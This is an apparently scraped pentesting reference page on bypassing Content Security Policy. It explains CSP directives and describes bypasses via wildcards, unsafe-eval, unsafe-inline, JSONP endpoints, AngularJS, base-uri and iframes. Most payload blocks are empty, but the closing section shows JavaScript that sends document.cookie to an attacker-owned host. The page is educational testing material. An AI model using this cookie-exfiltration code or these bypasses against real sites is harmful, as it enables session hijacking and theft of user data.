search

🧰CSP Bypass

hashtag
To validate the CSP of your application, check out CSP Evaluator.

LogoCSP Evaluatorcsp-evaluator.withgoogle.comchevron-right
LogoCSP Header Inspector and Validatorcspvalidator.orgchevron-right

hashtag
CSP Directives (policy )

hashtag
script-src:

hashtag
Specifies the JavaScript sources that are allowed. Additionally, inline script event handlers (onclick) and XSLT stylesheets (eXtensible Stylesheet Language) that trigger script execution can also be loaded into elements.

hashtag
default-src:

hashtag
This directive specifies how resources are fetched by default. The browser follows this directive if fetch directives are not included in the CSP header.

hashtag
child-src:

hashtag
This directive specifies what resources web workers and embedded frames can use.

hashtag
frame-src:

hashtag
This directive limits the URLs that can be called out as frames.

hashtag
frame-ancestors:

hashtag
A directive specifies the sources where this page can be embedded. It applies only to non-HTML resources and can't be used in tags(used to prevent clickjacking attacks).

hashtag
img-src:

hashtag
This specifies which sources can be used to load images on the web page.

hashtag
object-src:

hashtag
This property defines the allowed sources for the elements object, embed, and widget.

hashtag
base-uri:

hashtag
With this element, you can define the allowed URLs for an element to load using.

hashtag
upgrade-insecure-requests:

hashtag
By using this directive, browsers are instructed to rewrite URL schemes so that HTTP is replaced by HTTPS. Rewriting old URLs can be beneficial for websites with many old URLs.

hashtag
sandbox:

hashtag
The sandbox (document) directive creates a sandbox around the resource, similar to the sandbox attribute. As a result, popups are prevented, plugins and scripts are prohibited, and a same-origin policy is enforced.

hashtag
Some other CSP directives include: prefetch-src, connect-src, form-action, etc.

hashtag
----------------------------------------------------------------

hashtag
Values for CSP Directives

  • *: Except for data: blob: filesystem schemes, any URL can be used.

  • none: No sources are allowed to be loaded in this case.

  • self: A source that defines that resources from the same domain are permitted to be loaded.

  • data: Load resources using the data scheme (e.g. Base64 encoded images)

  • unsafe-eval: This allows you to create code from strings using eval() and window.execScript. This source should not be included in any directives. That's why it's called unsafe.

  • unsafe-hashes: Use this to enable specific event handlers inline.

  • unsafe-inline: This allows using inline resources, such as inline elements, javascript: URLs, and inline event handlers. For security reasons, this is not recommended.

  • nonce: An inline script whitelist that uses a cryptographic nonce (number used once). A nonce value must be unique and generated each time the server transmits a policy.

  • sha256-<hash>: The script has to have a specific SHA256 hash to be whitelisted.

hashtag
----------------------------------------------------------------

hashtag
Unsafe Policies

hashtag
Wildcard(*)

hashtag
In script-src, a wildcard is used, which results in a misconfigured CSP policy. This means that any source for a given directive is allowed.

hashtag
Policy Example:

hashtag
CSP Header

hashtag
Content-Security-Policy: script-src 'self' https://cobalt.io https: data *;

hashtag
XSS payloads:

hashtag
----------------------------------------------------------------

hashtag
Unsafe eval()

hashtag
Whitelisted Scheme

hashtag
This policy remains vulnerable due to unsafe-eval usage despite having the script source set to https://www.cobalt.ioarrow-up-right.

hashtag
Policy Example:

hashtag
CSP Header

hashtag
Content-Security-Policy: script-src https://cobalt.io 'unsafe-eval' data: http://*;

hashtag
XSS payloads:

hashtag
----------------------------------------------------------------

hashtag
Unsafe inline

hashtag
The best CSP source value for script-src directive we can find since it allows everything we might need: event handlers, javascript pseudo-protocol, and scripts. A simple alert(1) is enough for XSS.

hashtag
Despite this policy requiring scripts from the Target site, it is vulnerable because the directive uses unsafe-inline.

hashtag
Policy Example:

hashtag
CSP Header

hashtag
Content-Security-Policy: script-src ‘self’ 'unsafe-inline' ;

hashtag
XSS payloads:

hashtag
----------------------------------------------------------------

hashtag
JSONP Callback and Whitelisted the Third Party

hashtag
In JSONParrow-up-right, the same-origin policy (SOP) is bypassed so you can request and retrieve data from a server without worrying about cross-domain issues.

hashtag
JavaScript payloads can be injected into JSONP endpoints through GET parameters called "callbacks", and the endpoint will return them to you as JSONarrow-up-right, bypassing SOP(same origin policy). For example, we can send our JavaScript payload via the JSONP endpoint. Below is an example:

hashtag
The script-src policy can cause problems if a header has one of these endpoints and Domains whitelisted.

hashtag
There were a bunch of allowed/whitelisted URLs. Thus I scrolled down and started looking for something that might help me bypass the CSP. When I scrolled to the end I got to know that the script-src allowed the YOUTUBE.

hashtag
The JSONP endpoint would allow us to bypass the CSP policy by loading our malicious JavaScript. There are a number of ready-to-use CSP bypass endpoints available in JSONBeearrow-up-right.

hashtag
All whitelisted domains are a breach on the respective policy so if we find a way to import a JSONP endpoint with a callback or to include a JS library (with unsafe-eval) too, it will work flawless. An old (also non-verified) list of possible JSONP endpoints with callback for several well-known websites can be found herearrow-up-right.

hashtag
Policy Example:

hashtag
CSP header

hashtag
script-src https://www.google.com https://accounts.google.comarrow-up-right;

hashtag
The following payload would be loaded because accounts.google.com allows JavaScript files to be loaded. To load our malicious JavaScript, we are abusing the JSONP feature.

hashtag
XSS payloads:

hashtag
----------------------------------------------------------------

hashtag
object-src and default-src

hashtag
CSP header

hashtag
Content-Security-Policy: script-src 'self' ;

hashtag
----------------------------------------------------------------

hashtag
Angular JS

Whitelisted Domain

hashtag
The CSP policy can be bypassed if the AngularJSarrow-up-right application loads any scripts from a whitelisted domain. To accomplish this, a callback function and vulnerable class must be called. In addition, a special $event object is defined for AngularJS eventsarrow-up-right, which simply refers to the browser event object. Through this object, you can bypass the CSP.

hashtag
Policy Example:

hashtag
CSP header

hashtag
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;

hashtag
XSS payloads:

hashtag
----------------------------------------------------------------

hashtag
File Upload

hashtag
You can bypass the CSP if you can upload a JS file. There is a high probability that the server validates the uploaded file and allows only the specified file types to be uploaded.

hashtag
In addition, even if you upload JS code into a file with an extension accepted by the server (e.g. script.png if png extension is allowed), this won't suffice because some servers, like the Apache serverarrow-up-right, determine the MIME typearrow-up-right of the file based on its extension. Chrome browser, for example, rejects Javascript code running in an image.

hashtag
CSP header

hashtag
Content-Security-Policy: script-src 'self'; object-src 'none' ;

hashtag
XSS payloads:

hashtag
----------------------------------------------------------------

hashtag
base-uri Bypass

hashtag
If there’s a running script on the page called with a relative path like /path/script.js after the point of injection, there’s no base URI set in the document and no base-uri directive, there’s a simple bypass for any CSP implemented.

hashtag
A dangling markup injection can be performed if the base-uri directive is absent in the defined CSP. You can abuse the base tag to obtain an XSS by making the page load a script from your server if the script has a relative path (like /js/app.js). An HTTPS URL should be used if the vulnerable page is loaded over HTTPS.

hashtag
Policy Example:

hashtag
CSP header

hashtag
Content-Security-Policy: script-src 'nonce-abcd1234';

hashtag
XSS payloads:

hashtag
if Policy Example Fixed or Predictable Nonce:

hashtag
Then XSS payloads:

hashtag
----------------------------------------------------------------

hashtag
Folder path bypass

hashtag
When you use the %2f to encode '/' as part of your CSP policy and point it to a folder, it will still be considered part of the folder. That seems to be the case with almost all modern-day browsers.

hashtag
When the server decodes it, it can be bypassed by using "%2f..%2f", bypassing the folder restriction. For example, you can access http://example.com/company/, and executing http://example.com/company%2f..%2fattacker/file.js will bypass the restriction.

hashtag
CSP header:

hashtag
Content-Security-Policy: script-src cobalt.io/safe-directory/

hashtag
XSS payloads:

hashtag
----------------------------------------------------------------

hashtag
Bypassing CSP using IFRAME

hashtag
Attackers can use Iframes to bypass the below CSP policy. An iframe from the whitelisted domain must be allowed by the application in order to perform the bypass. An XSS attack can be easily facilitated by using the srcdocarrow-up-right attribute of the iframe.

hashtag
CSP header

hashtag
Policy Example: default-src 'self' data: *; connect-src 'self'; script-src 'self' ;

hashtag
XSS payloads:

hashtag
*** DOM-based XSS Tip ***

hashtag
In DOM-based injection scenarios, a script used for a CSP bypass might not load so we can use the following to achieve Javascript execution:

hashtag
XSS vector for when you need to call a script to bypass some "script-src" CSP directive in a DOM-based scenario.

hashtag
XSS payload:

hashtag
----------------------------------------------------------------

hashtag
CSP Injection Bypass

hashtag
In this case, the input from the user is reflected back in the CSP header. Let's take the following URL as an example:

hashtag
https://www.cobalt.io?param=payload.

hashtag
This is what you should see if your input is reflected in the CSP header.

hashtag
CSP header

hashtag
script-src payload;

hashtag
object-src 'none';

hashtag
base-uri 'none';

hashtag
script-src can therefore be set to whatever value we want. This value can be easily set to a domain we control, bypassing the CSP.

hashtag
----------------------------------------------------------------

hashtag
CSP Data Exfiltration

hashtag
Even though there’s a strict CSP that prohibits you from interacting with external servers, there are still things you can do to exfiltrate the data regardless of how strict the CSP is.

hashtag
Location

hashtag
In order to send the secret information to the attacker's server, you could simply update the location:

hashtag
var sessionid = document.cookie.split('=')[1] + ".";

hashtag
document.location = "https://www.attacker-owned-website.com/?" + sessionid;

hashtag
----------------------------------------------------------------

PreviousFile Upload HTML InjectionNextCSP Bypass Cheat Sheet

Last updated